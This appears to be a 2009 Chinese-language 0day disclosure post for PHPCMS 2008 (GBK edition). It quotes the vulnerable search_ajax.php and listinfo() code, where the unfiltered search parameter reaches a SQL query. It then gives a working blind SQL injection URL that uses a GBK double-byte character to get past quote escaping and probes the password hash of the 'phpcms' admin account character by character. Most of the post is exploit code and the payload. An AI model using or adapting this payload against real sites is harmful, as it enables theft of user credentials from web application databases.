phpcms2008GBK双字节编码0day

发布者:幻泉,发布时间:2009年3月4日 上午4:29   [ 更新时间:2009年3月30日 上午7:57 ]
漏洞作者:幻泉[B.S.N]
源码下http://www.phpcms.cn/phpcms2008/
官方网http://www.phpcms.cn
漏洞等级:高
漏洞说明:
/ask/search_ajax.php
  
Code:
if($q)
     {
        $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where
     }
    else
     {
        exit('null');
     }
   $infos = $ask->listinfo($where, 'askid DESC', '', 10);

/ask/include/answer.class.php
  
Code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
        {
                if($where) $where = " WHERE $where";
                if($order) $order = " ORDER BY $order";
                $page = max(intval($page), 1);
                $offset = $pagesize*($page-1);
                $limit = " LIMIT $offset, $pagesize";
                $r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");
                $number = $r['number'];
                $this->pages = pages($number, $page, $pagesize);
                $array = array();
                $i = 1;
                $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
                while($r = $this->db->fetch_array($result))
                {
                        $r['orderid'] = $i;
                        $array[] = $r;
                        $i++;
                }
                $this->number = $this->db->num_rows($result);
                $this->db->free_result($result);
                return $array;
        }


/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

信息来源:黑客防线  (http://www.hacker.com.cn ; ) 09.02.24
Comments